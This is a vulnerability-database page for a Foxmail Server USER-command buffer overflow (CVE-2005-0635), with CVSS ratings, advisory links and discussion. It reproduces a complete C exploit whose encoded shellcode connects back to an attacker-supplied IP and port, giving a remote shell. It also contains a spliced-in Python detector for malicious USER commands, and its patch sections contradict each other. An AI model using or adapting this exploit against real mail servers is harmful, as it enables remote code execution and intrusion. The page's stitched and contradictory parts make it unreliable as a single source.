CVE-2005-0635
CVSS 10.0
Published: 2005-05-02 00:00:00
Revised: 2008-09-05 16:46:52

[Original] Buffer overflow in Foxmail Server 2.0 allows remote attackers to execute arbitrary code via a long USER command.


[CNNVD] Foxmail Server "USER" Command Handling Multiple Remote Buffer Overflow Vulnerabilities (CNNVD-200505-589)

        Foxmail Server is a mail server program that runs on both Windows and Linux.
        Foxmail Server has a buffer overflow in its handling of the arguments of certain commands; a remote attacker could exploit it to execute arbitrary instructions on the server.

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may bring the system down entirely]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0635
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0635
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-589
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/12711
(UNKNOWN)  BID  12711
http://www.securityfocus.com/archive/1/391960
(VENDOR_ADVISORY)  BUGTRAQ  20050302 Foxmail server "USER" command Multiple remote buffer overflow
http://securitytracker.com/id?1013356
(VENDOR_ADVISORY)  SECTRACK  1013356
http://secunia.com/advisories/14145
(VENDOR_ADVISORY)  SECUNIA  14145

- Vulnerability information

Foxmail Server "USER" Command Handling Multiple Remote Buffer Overflow Vulnerabilities
Critical  Buffer overflow
2005-05-02 00:00:00 2005-10-20 00:00:00
Remote
        Foxmail Server is a mail server program that runs on both Windows and Linux.
        Foxmail Server has a buffer overflow in its handling of the arguments of certain commands; a remote attacker could exploit it to execute arbitrary instructions on the server.

- Advisories and patches

        The vendor has released an upgrade patch that fixes this security issue; download it from the vendor's homepage:
        http://fox.foxmail.com.cn/cgi/download/nt/nph-install_nt.cgi

- Vulnerability information (854)

Foxmail 1.1.0.1 POP3 Temp Dir Stack Overflow Exploit (EDBID:854)
windows remote
2005-03-02 Verified
110 Swan
N/A
#include <winsock.h>
#include <windows.h>
#include <stdio.h>
#include <conio.h>
#pragma comment (lib,"ws2_32")
#define PORT_OFFSET  118
#define IP_OFFSET    111

char Shellcode[] =      "\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA"
                                       "\xEB\x05\xE8\xEB\xFF\xFF\xFF"
                                       "\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
                                       "\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3\x9D\xC0\x71\x02\x99\x99\x99"
                                       "\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE\xEA\xAB\xC6\xCD\x66\x8F\x12"
                                       "\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99\x7B\x60\x18\x75\x09\x98\x99"
                                       "\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF\x89\xC9\xC9\xC9\xC9\xD9\xC9"
                                       "\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6\x99\x99\x98\xF1\x9B\x99\x99"
                                       "\xAC\x12\x55\xF3\x89\xC8\xCA\x66\xCF\x81\x1C\x59\xEC\xD3\xF1\xFA"
                                       "\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD\x14\xA5\xBD\xF3\x8C\xC0\x32"
                                       "\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD\xBD\xA4\x10\xC5\xBD\xD1\x10"
                                       "\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD\xBD\x89\xCD\xC9\xC8\xC8\xC8"
                                       "\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66\xCF\x9D\x12\x55\xF3\x66\x66"
                                       "\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66\xCF\x95\xC8\xCF\x12\xDC\xA5"
                                       "\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB\xB9\x9A\x6C\xAA\x50\xD0\xD8"
                                       "\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3\x4F\xED\x91\x58\x52\x94\x9A"
                                       "\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC3\x12\xC3\xBD\x9A\x44\xFF\x12"
                                       "\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D\x12\x9A\x5C\x32\xC7\xC0\x5A"
                                       "\x71\x99\x66\x66\x66\x17\xD7\x97\x75\xEB\x67\x2A\x8F\x34\x40\x9C"
                                       "\x57\xE7\x41\x7B\xEA\x52\x74\x65\xA2\x40\x90\x6C\x34\x75\x60\x33"
                                       "\xF9\x7E\xE0\x5F\xE0";

char szUser[]   =       "user 1231231231231234567890abcdefghijklmnopqrstuvwxyz1234567890a"
                                       "bcdefghijklmnopqrstuvwxyz1234567890abcdefghijklmnopqrstuvwxyz123"
                                       "4567890abcdefghijklmnopqrstuvwxyz1234567890abcdefghijkklmnopqrst"
                                       "uvwxyz1234567890abcdefghijkklmnopqrstuvwxyz1234567890abcdAAAAijk"
                                       "lmnopqrstuvwxyz1234567890abcdefghijklmnopqrstuvwxyz1234567890abc"
                                       "defghijklmnopqrstuvwxyz1234567890abcdefghijklmnopqrstuvwxyz12345"
                                       "67890abcdefghijklmnopqrstuvwxyz1234567890abcdefghijklmnopqrstuvw"
                                       "xyz1234567890abcdefghijklmnopqrstuvwxyz1234567890abcdefghijklmno"
                                       "pqrstuvwxyz1234567890abcdefghijklmnopqrstuvwxyz1234567890abcdefg"
                                       "hijklmnopqrstuvwxyz1234567890abcdefghijklmnopqrstuvwxyz123456789"
                                       "0abcdefghijklmnopqrstuvwxyz1234567890abcdefghijklmnopqrstuvwxyz1"
                                       "234567890abcdefghijklmnopqrstuvwxyz1234567890abcdefghijklmnopqrs"
                                       "tuvwxyz1234567890abcdefghijklmnopqrstuvwxyz1234567890abcdefghijk"
                                       "lmnopqrstuvwxyz1234567890abcdefghijklmnopqrstuvwxyz1234567890abc"
                                       "defghijklmnopqrstuvwxyz1234567890abcdefghijklmnopqrstuvwxyz12345"
                                       "67890abcdefghijklmnopqrstuvwxyz1234567890abcdefghijklmnopqrstuvw"
                                       "xyz1234567890abcdefghijklmnopqrstuvwxyz1234567890abcdefghijklmno"
                                       "pqrstuvwxyz1234567890abcdefghijklmnopqrstuvwxyz1234567890abcdefg"
                                       "hijklmnopqrstuvwxyz\r\n";
unsigned char szPass[] = "pass siglos\r\n";

void help(char *program)
{
       printf ("========================================================\r\n");
       printf ("Aerofox Mail Server 1.1.0.1 POP3 Temp Dir Stack Overflow\r\n");
       printf ("========================================================\r\n\r\n");
       printf ("Usage: %s <Host> <Your IP> <Your port>\r\n", program);
       printf ("e.g.:\r\n");
       printf ("     %s 127.0.0.1 202.119.9.42 8111\r\n", program);
       printf ("\r\n  The ret address is 0x7ffa1571.\r\n");
       exit(0);
}

SOCKET Connect(char *u_host ,unsigned short u_port)
{
       WSADATA wsaData;
       SOCKET sock;
       struct hostent *r;
       struct sockaddr_in r_addr;
       int timeout = 1000;

       if(WSAStartup(0x0101,&wsaData) != 0)
       {
               printf("error starting winsock..");
               return -1;
       }
       if((r=gethostbyname(u_host))== NULL)
       {
               return -1 ;
       }
       if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))== INVALID_SOCKET)
       {
               return -1 ;
       }
       r_addr.sin_family=AF_INET;
       r_addr.sin_port=htons(u_port);
       r_addr.sin_addr=*((struct in_addr*)r->h_addr);

       if(connect(sock,(struct sockaddr *)&r_addr,sizeof(r_addr))==SOCKET_ERROR)
       {
               printf("Can't connect\n");
               exit(-1);
       }
       setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO, (char*)&timeout,sizeof(timeout));
       return(sock);
}

void Disconnect(SOCKET s)
{
       closesocket(s);
       WSACleanup();
}

void tr(SOCKET s)
{
       char buff[1500];
       memset(buff, 0, sizeof(buff));
       recv(s, buff, sizeof(buff), 0);
       printf("%s\r\n",buff);
}

void SlowSend(SOCKET s, char *buf, int p)
{
       //send(s, buf, sizeof(buf),0);
       //send(s, "\r\n", 2,0);
       for(unsigned int i = 0; i < strlen(buf); i++)
       {
               Sleep(p);
               printf("%c", buf[i]);
               send(s, (char*)&(buf[i]), 1, 0);
       }
}

void main(int argc, char *argv[])
{
       /*_asm{
               mov             eax,90909091h
               dec             eax
       a:      dec             ebx
               cmp             [ebx], eax
               jnz             a
               push    ebx
               ret
       }*/
       if(argc != 4)
               help(argv[0]);

       unsigned short    port;
       unsigned long     ip;

       port = htons(atoi(argv[3]))^(USHORT)0x9999;
       ip = inet_addr(argv[2])^(ULONG)0x99999999;
       memcpy(&Shellcode[PORT_OFFSET], &port, 2);
       memcpy(&Shellcode[IP_OFFSET], &ip, 4);

       SOCKET s = Connect(argv[1], 110);
       tr(s);
       memcpy(szUser + 244, "\xCC\x90\xEB\x04\x71\x15\xFA\x7F", 8);
       memcpy(szUser + 244 + 8,  "\xB8\x91\x90\x90\x90\x48\x4B\x39\x03\x75\xFB\x53\xC3\x90\x90\x90\x90", 17);
       memcpy(szUser + 244 + 8 + 17, Shellcode, sizeof(Shellcode) - 1);

       SlowSend(s, (char*)szUser, 1);
       getch();
       tr(s);
       SlowSend(s, (char*)szPass, 100);
       tr(s);
       Disconnect(s);
       return;
}

// milw0rm.com [2005-03-02]

- Vulnerability information

14370
Foxmail Server USER Command Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

Unknown or Incomplete

- Timeline

2005-03-02 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Foxmail USER Command Multiple Remote Vulnerabilities
Unknown 12711
Yes No
2005-03-02 12:00:00 2009-07-12 10:56:00
Discovery is credited to Xin Ouyang <xouyang@fortinet.com>.

- Affected program versions

Foxmail Email Server 2.0

- Vulnerability discussion

Foxmail is reported prone to multiple remote vulnerabilities. These issues include a buffer overflow and a format string vulnerability. An attacker may exploit these issues to execute arbitrary code on a vulnerable computer to gain unauthorized access.

The following specific issues were identified:

It is reported that Foxmail server is prone to a remote buffer overflow vulnerability. The problem presents itself when the application receives excessive data through the USER command. It is also reported that this issue may also cause a heap overflow.

The application is also affected by a remote format string vulnerability. It is reported that this issue presents itself when the server processes a malicious USER command.

Foxmail Server For Windows version 2.0 is reported vulnerable. It is possible that Foxmail Server For Unix is affected as well.
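A defender-side check for the USER-command issues described above, added here as an example that is not part of this record, of the exploit, or of any Foxmail code: it reassembles the client side of a POP3 session into lines and flags USER arguments that exceed the 40-character argument limit of RFC 1939, contain non-printable bytes (the overflow payload), or carry printf-style specifiers (the format-string variant). The sample session is constructed, and the reassembly step exists because the exploit above deliberately sends one byte at a time.

```python
import re
# RFC 1939 section 3 caps a POP3 command argument at 40 characters; the USER string the
# exploit above sends is well over 1,000 bytes. printf-style specifiers in a username are
# a format-string probe indicator (heuristic: "50%off" would also match).
MAX_ARG_LEN = 40
FMT_SPEC = re.compile(rb"%[-+ #0]*\d*(?:\.\d+)?[diouxXeEfgGcspn]")

def reassemble(chunks):
    """Rejoin a client byte stream delivered in arbitrary chunks into LF-terminated lines;
    the exploit above sends one byte per send(), so per-packet checks never see a whole line."""
    buf = b""
    for chunk in chunks:
        buf += chunk
        while b"\n" in buf:
            line, buf = buf.split(b"\n", 1)
            yield line + b"\n"
    if buf:
        yield buf

def inspect_user_command(raw):
    """Return (argument length, reasons) for one POP3 line; reasons is [] when the line is
    benign or is not a USER command (the exploit sends the keyword in lower case)."""
    parts = raw.rstrip(b"\r\n").split(b" ", 1)
    if parts[0].upper() != b"USER":
        return 0, []
    arg = parts[1] if len(parts) > 1 else b""
    reasons = []
    if len(arg) > MAX_ARG_LEN:
        reasons.append("oversized_argument")
    if any(c < 0x20 or c > 0x7E for c in arg):
        reasons.append("non_printable_bytes")
    if FMT_SPEC.search(arg):
        reasons.append("format_specifier")
    return len(arg), reasons

def scan_stream(chunks):
    """Reassemble the client side of a session; return [(line_no, arg_len, reasons), ...]
    for every USER command that trips a check."""
    findings = []
    for n, line in enumerate(reassemble(chunks), start=1):
        arg_len, reasons = inspect_user_command(line)
        if reasons:
            findings.append((n, arg_len, reasons))
    return findings

# Constructed sample session (not captured traffic): a benign login followed by three
# probes, fed in one byte at a time the way the exploit's SlowSend() sends them.
SAMPLE = (b"USER alice\r\nPASS hunter2\r\n" + b"user " + b"A" * 600 + b"\r\n"
          + b"USER %n%n%n%n\r\n" + b"USER bob\x90\x90\xeb\x04\r\n")
SAMPLE_CHUNKS = [bytes([c]) for c in SAMPLE]
```

Running scan_stream(SAMPLE_CHUNKS) reports lines 3, 4 and 5 with one reason each; a signature that only looked at individual one-byte packets would report nothing.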

- Exploit

An exploit for the buffer overflow vulnerability was provided. A proof of concept for the heap overflow is available as well. A proof of concept for the format string issue has also been released.

- Solution

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- References


About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE, CWE and OVAL are registered trademarks of the MITRE Corporation; their official data sources are kept on the relevant MITRE websites.